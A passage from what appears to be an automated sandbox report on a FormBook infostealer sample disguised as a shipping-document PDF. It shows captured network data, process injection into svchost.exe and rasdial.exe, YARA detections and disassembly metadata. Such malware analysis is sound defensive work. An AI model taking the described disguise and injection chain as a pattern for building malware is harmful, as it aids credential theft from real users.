FbuX5DnP=pTM1zeR2SjipbVpcv/CfIZXB1pxs+ryI3quh9uPqK1VppyHSNB9PKMCkL4xqVACqjwjsMX0HHl+7PWTK/eL70ibpY85fQPJQDxUeKeH4xqET6vdvT+3PBSvC4Xrnea8ayViMTbp+LOTu9+cgpoL3hz60dcVKq5FhFrWKvJZPOEB4C+MBTqWp5nE5LrsK05h6p/26r5QSRSdF+R/nSaTF4Xs2J11pUavs9mnOQXw2blPRs2BJbNGIDKnUyq35P8AujE0GkiMb/7EmQvcxLTay0mNqREyKnacXu0dqtctevwUZGsAwJSxxMEbfiHUz/kPUbslMn66MoB3S//EjO+gulUigom7KtqCwfmS9jhSj/oLsu9f/QYyGL/1rsuyIfkX411iW2SHRVxuJYMywgYBPePishu7ISoQx741G1KIYfuzdR5Q6HWJIBo+Y6XBntItaRI+zX2WhxPKv5GIvdYXy1utqNELwnvwwFFm3cLXmTmC/aK2u7+yUm4KHud3UZHaV9expr/OX/A895R71+UJNZfci01CADHD54fja8otKFthWiC9MbCSrQyNDjw5GFcOj92jm12inoOgUEWUdkOQcu6obKLBZEalUuFqVVC+ffArSifzHa9uxouHBwzFQLqX8M5woWlSnZc6e0q6BLRCvI5DBsyNU15+k5dMBmBI3q5fv2TI0szvL3KuUllo6AostVt/hCNKPNWnYJ8Rli3RrMCWhxJE4Ob1WdVcx6Vs2aBnbKFm/5PfL5UeiC3RkWD3ShY2dRGUnpKGIr61lNcLSrwV8gXei1ST3FFNxNCAEEU4esF9n/DEOvOonwQrvIaaHJiWOR6hJJAPbZejtH1L+gw3l9ngYrICSu9cIgrYLhiY5isWkG3ihUhQk/ntObbREMxMX0CSC6Pv1BKgCOXdaXi7iwh5mIe+jHZfogdMXDM+cidAb0LtX2/ce/YtyUu9pWpJZ7nY6lDAtzUor3hoQ+FRCynmNghDA4L0umph46DL [TRUNCATED]
                                                                                                                    Sep 30, 2024 20:00:08.221538067 CEST549INHTTP/1.1 400
                                                                                                                    Server: ZGS
                                                                                                                    Date: Mon, 30 Sep 2024 18:00:08 GMT
                                                                                                                    Content-Type: text/html;charset=ISO-8859-1
                                                                                                                    Content-Length: 80
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: zalb_8ae64e9492=d2341ff8556820e5fe7583c4c06e32ae; Path=/
                                                                                                                    Set-Cookie: csrfc=4605a47d-6d9c-42db-bc67-e09de93ef04a;path=/;priority=high
                                                                                                                    Set-Cookie: _zcsr_tmp=4605a47d-6d9c-42db-bc67-e09de93ef04a;path=/;SameSite=Strict;priority=high
                                                                                                                    Set-Cookie: JSESSIONID=EBE519C6F1B0E0C817DE24A629C04189; Path=/; HttpOnly
                                                                                                                    Data Raw: 7b 22 72 65 73 70 6f 6e 73 65 5f 63 6f 64 65 22 3a 22 34 30 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 22 31 22 2c 22 64 65 76 65 6c 6f 70 65 72 5f 6d 65 73 73 61 67 65 22 3a 22 49 6e 76 61 6c 69 64 20 69 6e 70 75 74 2e 22 7d 0a 0a
                                                                                                                    Data Ascii: {"response_code":"400","status_code":"1","developer_message":"Invalid input."}


                                                                                                                    Statistics

                                                                                                                    CPU Usage

                                                                                                                    Click to jump to process

                                                                                                                    Memory Usage

                                                                                                                    Click to jump to process

                                                                                                                    High Level Behavior Distribution

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Behavior

                                                                                                                    Click to jump to process

                                                                                                                    System Behavior

                                                                                                                    General

                                                                                                                    Target ID:0
                                                                                                                    Start time:13:56:00
                                                                                                                    Start date:30/09/2024
                                                                                                                    Path:C:\Users\user\Desktop\z4Shipping_document_pdf.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\z4Shipping_document_pdf.exe"
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:1'400'925 bytes
                                                                                                                    MD5 hash:AEB5E672510E739F463553E45D7F7283
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:2
                                                                                                                    Start time:13:56:05
                                                                                                                    Start date:30/09/2024
                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\z4Shipping_document_pdf.exe"
                                                                                                                    Imagebase:0x30000
                                                                                                                    File size:46'504 bytes
                                                                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2533356134.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2533356134.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2533799840.0000000004400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2533799840.0000000004400000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:4
                                                                                                                    Start time:13:56:37
                                                                                                                    Start date:30/09/2024
                                                                                                                    Path:C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe"
                                                                                                                    Imagebase:0x740000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4551198252.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4551198252.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:5
                                                                                                                    Start time:13:56:38
                                                                                                                    Start date:30/09/2024
                                                                                                                    Path:C:\Windows\SysWOW64\rasdial.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\SysWOW64\rasdial.exe"
                                                                                                                    Imagebase:0x3f0000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:A280B0F42A83064C41CFFDC1CD35136E
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4550544505.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4550544505.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4550198146.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4550198146.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4551356910.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4551356910.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:7
                                                                                                                    Start time:13:56:52
                                                                                                                    Start date:30/09/2024
                                                                                                                    Path:C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe"
                                                                                                                    Imagebase:0x740000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4553080384.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4553080384.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:8
                                                                                                                    Start time:13:57:03
                                                                                                                    Start date:30/09/2024
                                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                    Imagebase:0x7ff79f9e0000
                                                                                                                    File size:676'768 bytes
                                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Disassembly

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:1.3%
                                                                                                                      Dynamic/Decrypted Code Coverage:5.6%
                                                                                                                      Signature Coverage:14.5%
                                                                                                                      Total number of Nodes:124
                                                                                                                      Total number of Limit Nodes:7
                                                                                                                      execution_graph 80234 42e643 80237 42c7b3 80234->80237 80236 42e65e 80238 42c7d0 80237->80238 80239 42c7de RtlAllocateHeap 80238->80239 80239->80236 80240 42bb03 80241 42bb1d 80240->80241 80244 3372df0 LdrInitializeThunk 80241->80244 80242 42bb42 80244->80242 80245 42f783 80248 42e563 80245->80248 80251 42c803 80248->80251 80250 42e57c 80252 42c81d 80251->80252 80253 42c82b RtlFreeHeap 80252->80253 80253->80250 80260 424913 80261 42492f 80260->80261 80262 424957 80261->80262 80263 42496b 80261->80263 80264 42c4b3 NtClose 80262->80264 80265 42c4b3 NtClose 80263->80265 80266 424960 80264->80266 80267 424974 80265->80267 80270 42e683 RtlAllocateHeap 80267->80270 80269 42497f 80270->80269 80272 424ca3 80276 424cbc 80272->80276 80273 424d04 80274 42e563 RtlFreeHeap 80273->80274 80275 424d14 80274->80275 80276->80273 80277 424d47 80276->80277 80279 424d4c 80276->80279 80278 42e563 RtlFreeHeap 80277->80278 80278->80279 80280 413ee3 80281 413efd 80280->80281 80286 417683 80281->80286 80283 413f1b 80284 413f59 PostThreadMessageW 80283->80284 80285 413f60 80283->80285 80284->80285 80287 4176a7 80286->80287 80288 4176e3 LdrLoadDll 80287->80288 80289 4176ae 80287->80289 80288->80289 80289->80283 80290 413973 80291 413995 80290->80291 80293 42c723 80290->80293 80294 42c740 80293->80294 80297 3372c70 LdrInitializeThunk 80294->80297 80295 42c765 80295->80291 80297->80295 80298 41b1f3 80299 41b237 80298->80299 80300 41b258 80299->80300 80301 42c4b3 NtClose 80299->80301 80301->80300 80302 413f74 80304 413f60 80302->80304 80305 413f3c 80302->80305 80303 413f59 PostThreadMessageW 80303->80304 80305->80303 80305->80304 80271 3372b60 LdrInitializeThunk 80254 418c48 80257 42c4b3 80254->80257 80256 418c52 80258 42c4d0 80257->80258 80259 42c4de NtClose 80258->80259 80259->80256 80306 401a7e 80307 401aa0 80306->80307 80310 42fbf3 80307->80310 80313 42e113 80310->80313 80314 42e139 80313->80314 80325 407673 80314->80325 80316 42e14f 80324 401b7c 80316->80324 80328 41b003 80316->80328 80318 42e16e 80319 42e183 80318->80319 80343 42c843 80318->80343 80339 428213 80319->80339 80322 42e19d 80323 42c843 ExitProcess 80322->80323 80323->80324 80327 407680 80325->80327 80346 416343 80325->80346 80327->80316 80329 41b02f 80328->80329 80364 41aef3 80329->80364 80332 41b074 80334 41b090 80332->80334 80337 42c4b3 NtClose 80332->80337 80333 41b05c 80335 41b067 80333->80335 80336 42c4b3 NtClose 80333->80336 80334->80318 80335->80318 80336->80335 80338 41b086 80337->80338 80338->80318 80340 428274 80339->80340 80342 428281 80340->80342 80375 418503 80340->80375 80342->80322 80344 42c85d 80343->80344 80345 42c86e ExitProcess 80344->80345 80345->80319 80347 416360 80346->80347 80349 416376 80347->80349 80350 42cef3 80347->80350 80349->80327 80352 42cf0d 80350->80352 80351 42cf3c 80351->80349 80352->80351 80357 42bb53 80352->80357 80355 42e563 RtlFreeHeap 80356 42cfb2 80355->80356 80356->80349 80358 42bb70 80357->80358 80361 3372c0a 80358->80361 80359 42bb99 80359->80355 80362 3372c11 80361->80362 80363 3372c1f LdrInitializeThunk 80361->80363 80362->80359 80363->80359 80365 41afe9 80364->80365 80366 41af0d 80364->80366 80365->80332 80365->80333 80370 42bbf3 80366->80370 80369 42c4b3 NtClose 80369->80365 80371 42bc10 80370->80371 80374 33735c0 LdrInitializeThunk 80371->80374 80372 41afdd 80372->80369 80374->80372 80376 41852d 80375->80376 80382 418a2b 80376->80382 80383 413b53 80376->80383 80378 41865a 80379 42e563 RtlFreeHeap 80378->80379 80378->80382 80380 418672 80379->80380 80381 42c843 ExitProcess 80380->80381 80380->80382 80381->80382 80382->80342 80387 413b73 80383->80387 80385 413bdc 80385->80378 80386 413bd2 80386->80378 80387->80385 80388 41b313 RtlFreeHeap LdrInitializeThunk 80387->80388 80388->80386

                                                                                                                      Executed Functions

                                                                                                                      Function 00418503 Relevance: 2.9, Strings: 2, Instructions: 433COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 65 418503-41853a call 42e603 68 418545-418577 call 42e603 call 404c83 call 4242b3 65->68 69 418540 call 42e603 65->69 76 418a36-418a3a 68->76 77 41857d-4185a7 call 42e5b3 68->77 69->68 80 4185b2 77->80 81 4185a9-4185b0 77->81 82 4185b4-4185be 80->82 81->82 83 4185c0 82->83 84 4185df-4185f1 call 4242e3 82->84 85 4185c3-4185c6 83->85 91 418a34-418a35 84->91 92 4185f7-41860f call 42df63 84->92 87 4185c8-4185cb 85->87 88 4185cf-4185d9 85->88 87->85 90 4185cd 87->90 88->84 90->84 91->76 92->91 95 418615-418665 call 413b53 92->95 95->91 98 41866b-41868b call 42e563 95->98 101 41868d-41868f 98->101 102 4186bc-4186be 98->102 103 418691-41869f call 42dad3 call 4071b3 101->103 104 4186c7-4186e9 call 41b0a3 101->104 102->104 105 4186c0 102->105 113 4186a4-4186a9 103->113 104->91 111 4186ef-418711 call 42bd23 104->111 105->104 114 418716-41871b 111->114 113->102 115 4186ab-4186ba 113->115 114->91 116 418721-418797 call 42b6f3 call 42b7a3 call 42e5b3 114->116 115->116 123 4187a0 116->123 124 418799-41879e 116->124 125 4187a2-4187d2 123->125 124->125 126 4187d8-4187de 125->126 127 4188ae 125->127 129 4187e0-4187e3 126->129 130 4187ec-41880d call 42e5b3 126->130 128 4188b0 127->128 133 4188b7-4188bb 128->133 129->126 132 4187e5-4187e7 129->132 137 418819 130->137 138 41880f-418817 130->138 132->128 135 4188c1-4188c5 133->135 136 4188bd-4188bf 133->136 135->133 136->135 139 4188c7-4188db 136->139 140 41881c-418831 137->140 138->140 141 418945-418998 call 417603 * 2 call 42e583 139->141 142 4188dd-4188e2 139->142 143 418833 140->143 144 418844-418885 call 417583 call 42e5b3 140->144 174 41899a-41899e 141->174 175 4189bd-4189c2 141->175 146 4188e4-4188e7 142->146 147 418836-418839 143->147 170 418887-41888c 144->170 171 41888e 144->171 150 4188e9-4188ec 146->150 151 4188fe-418900 146->151 153 418842 147->153 154 41883b-41883e 147->154 150->151 157 4188ee-4188f0 150->157 151->146 152 418902-418904 151->152 152->141 158 418906-41890e 152->158 153->144 154->147 159 418840 154->159 157->151 162 4188f2-4188f5 157->162 163 418913-418916 158->163 159->144 162->151 166 4188f7 162->166 167 418918-41891b 163->167 168 41893f-418943 163->168 166->151 167->168 173 41891d-41891f 167->173 168->141 168->163 172 418890-4188ac call 414a93 170->172 171->172 172->128 173->168 180 418921-418924 173->180 176 4189a0-4189b1 call 407223 174->176 177 4189ca-4189d4 call 42b8e3 174->177 175->177 179 4189c4 175->179 185 4189b6-4189bb 176->185 186 4189d9-4189dc 177->186 179->177 180->168 184 418926-41893c 180->184 184->168 185->175 187 4189e3-4189f8 call 41b273 185->187 186->187 190 4189fa-418a26 call 417583 * 2 call 42c843 187->190 197 418a2b-418a2e 190->197 197->91
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: /$/
                                                                                                                      • API String ID: 0-2523464752
                                                                                                                      • Opcode ID: 8c360a7a7fa3ee93e9025e89ae73a747f6de6d11fdfa22e38ea4db826234b8dd
                                                                                                                      • Instruction ID: 518b769d01bafcf85ea822abd9d0359a626d147dcabc8677b7fad7f191391a0e
                                                                                                                      • Opcode Fuzzy Hash: 8c360a7a7fa3ee93e9025e89ae73a747f6de6d11fdfa22e38ea4db826234b8dd
                                                                                                                      • Instruction Fuzzy Hash: B0F1A3B0D00219AFDF24DB55CC85BEEB7B9AF44304F1481AEE409A7241DB789E81CF99
                                                                                                                      Function 00417683 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 216 417683-41769f 217 4176a7-4176ac 216->217 218 4176a2 call 42f263 216->218 219 4176b2-4176c0 call 42f863 217->219 220 4176ae-4176b1 217->220 218->217 223 4176d0-4176e1 call 42dbe3 219->223 224 4176c2-4176cd call 42fb03 219->224 229 4176e3-4176f7 LdrLoadDll 223->229 230 4176fa-4176fd 223->230 224->223 229->230
                                                                                                                      APIs
                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176F5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Load
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2234796835-0
                                                                                                                      • Opcode ID: 93b88033a21437db9dc92cbd3b34bdb9103027bdc71e498d04d4d7d2c72e8559
                                                                                                                      • Instruction ID: 6f4955222813c8fb1283a263e2be74e58301a9bbab35845d36dca485b7f49445
                                                                                                                      • Opcode Fuzzy Hash: 93b88033a21437db9dc92cbd3b34bdb9103027bdc71e498d04d4d7d2c72e8559
                                                                                                                      • Instruction Fuzzy Hash: 020175B5E0410DABDF10DBE5DC42FDEB7B89B14308F4041AAE90897240F635EB48CB95
                                                                                                                      Function 00401886 Relevance: 1.5, Strings: 1, Instructions: 284COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 231 401886-401888 232 40188a-4018c9 231->232 233 4018db-4018df 231->233 232->233 234 4018e1-401911 233->234 235 40194a-401975 233->235 236 40197b-40198a 234->236 238 401913-401921 234->238 235->236 239 40198b-4019c2 236->239 238->239 242 401923-40193d 238->242 246 401a12-401a2b 239->246 247 4019c4-4019cb 239->247 244 401944-401949 242->244 245 40193f-401975 242->245 244->235 245->236 250 401aaa-401ab3 246->250 251 401a2d-401a2f 246->251 248 401a4a-401a4f 247->248 249 4019cd-4019cf 247->249 255 401a51-401a57 248->255 256 401ab8-401acf call 401cf0 248->256 253 401aa0-401aa9 250->253 254 401ab5 250->254 253->250 254->256 258 401a62 255->258 259 401a59-401a5d 255->259 263 401ad4-401ae7 256->263 261 401a64-401a77 258->261 259->261 262 401a5f-401a61 259->262 261->253 262->258 263->263 264 401ae9-401afa 263->264 265 401b00-401b21 264->265 266 401b23 265->266 267 401b24-401b2a 265->267 266->267 267->265 268 401b2c-401b2e 267->268 269 401b30-401b38 268->269 270 401b3a-401b3e 269->270 271 401b3f 269->271 270->271 272 401b41 271->272 273 401b42-401b48 271->273 272->273 273->269 274 401b4a-401b4f 273->274 275 401b50-401b61 274->275 275->275 276 401b63-401b6f call 401000 275->276 278 401b74-401b7a call 42fbf3 276->278 279 401b7c-401b8b 278->279 280 401b90-401b96 279->280 280->280 281 401b98-401b9e 280->281
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: a```
                                                                                                                      • API String ID: 0-3259403941
                                                                                                                      • Opcode ID: ab7556fbb001442120219b2b179f2779b3842e3eb4463d64c49f850fa0cf08a6
                                                                                                                      • Instruction ID: 56acf8fbcaa17e698862ed56fce54c3b98fc7420684629e7ca0701b011853dc2
                                                                                                                      • Opcode Fuzzy Hash: ab7556fbb001442120219b2b179f2779b3842e3eb4463d64c49f850fa0cf08a6
                                                                                                                      • Instruction Fuzzy Hash: 9181DE71A001568FDF1A8F34DC922A5F775EB52314B5862BEE841AFAD6D2346842CB84
                                                                                                                      Function 0042C4B3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 293 42c4b3-42c4ec call 404a43 call 42d6e3 NtClose
                                                                                                                      APIs
                                                                                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C4E7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Close
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3535843008-0
                                                                                                                      • Opcode ID: a737ffaa91bab463ff9f951931d09f38dc128a9f21b223b1077ada910ee048dd
                                                                                                                      • Instruction ID: f22abd6ed9ce955e32d0f19356da1b85bd6c729bcf7b8d0e0b51834e4782c7f3
                                                                                                                      • Opcode Fuzzy Hash: a737ffaa91bab463ff9f951931d09f38dc128a9f21b223b1077ada910ee048dd
                                                                                                                      • Instruction Fuzzy Hash: E6E04F362002147BC520EA5AEC01EDB775CDFC5714F00441AFA4867241C774BA0187A4
                                                                                                                      Function 033735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 0bbca2025e6bc6f76bcfc8ab3558d20c892d97d600845a5c50ff30d0c5d5daa4
                                                                                                                      • Instruction ID: 917f52dbba1b796bd2681633bed76dd86b4ca3e545f7dbf4bdaadc366336074c
                                                                                                                      • Opcode Fuzzy Hash: 0bbca2025e6bc6f76bcfc8ab3558d20c892d97d600845a5c50ff30d0c5d5daa4
                                                                                                                      • Instruction Fuzzy Hash: 7390023561560802D100B25C4594746100687D0301FA5C411A042496CD87998A5165A2
                                                                                                                      Function 03372B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 307 3372b60-3372b6c LdrInitializeThunk
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 84cb24ef5bb491da0b795af1c231af124ed6ea05fa300061b8cfca7c7bf262e7
                                                                                                                      • Instruction ID: a8b59e76248eee6336b97430e42376aca4eb86ee89eab12a08214239a48b07cb
                                                                                                                      • Opcode Fuzzy Hash: 84cb24ef5bb491da0b795af1c231af124ed6ea05fa300061b8cfca7c7bf262e7
                                                                                                                      • Instruction Fuzzy Hash: EE900265212504034105B25C4494656400B87E0301B95C021E1014994DC62989916125
                                                                                                                      Function 03372DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: e89b7a712128bb30cfbe3ae392b5c62dbf40aba73e0a8e3fa037a1a78ae3e7e4
                                                                                                                      • Instruction ID: 0d9095a2597327938c26c873e44070ae3e6707a19be42baced3f7cd855470895
                                                                                                                      • Opcode Fuzzy Hash: e89b7a712128bb30cfbe3ae392b5c62dbf40aba73e0a8e3fa037a1a78ae3e7e4
                                                                                                                      • Instruction Fuzzy Hash: 9290023521150813D111B25C4584747000A87D0341FD5C412A042495CD975A8A52A121
                                                                                                                      Function 03372C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 5990b3cc9bae5a6aa0b6e68740f43dfe4deaecf4e86b7e31d7288fa0c6bb66c7
                                                                                                                      • Instruction ID: ce3d4cfb76f7b273ede5a09dd5045073773c09cc8d3cb6af6ef22905649b6fe6
                                                                                                                      • Opcode Fuzzy Hash: 5990b3cc9bae5a6aa0b6e68740f43dfe4deaecf4e86b7e31d7288fa0c6bb66c7
                                                                                                                      • Instruction Fuzzy Hash: 3990023521158C02D110B25C848478A000687D0301F99C411A4424A5CD879989917121
                                                                                                                      Function 00413EA7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68threadwindowCOMMON
                                                                                                                      Download Yara Rule
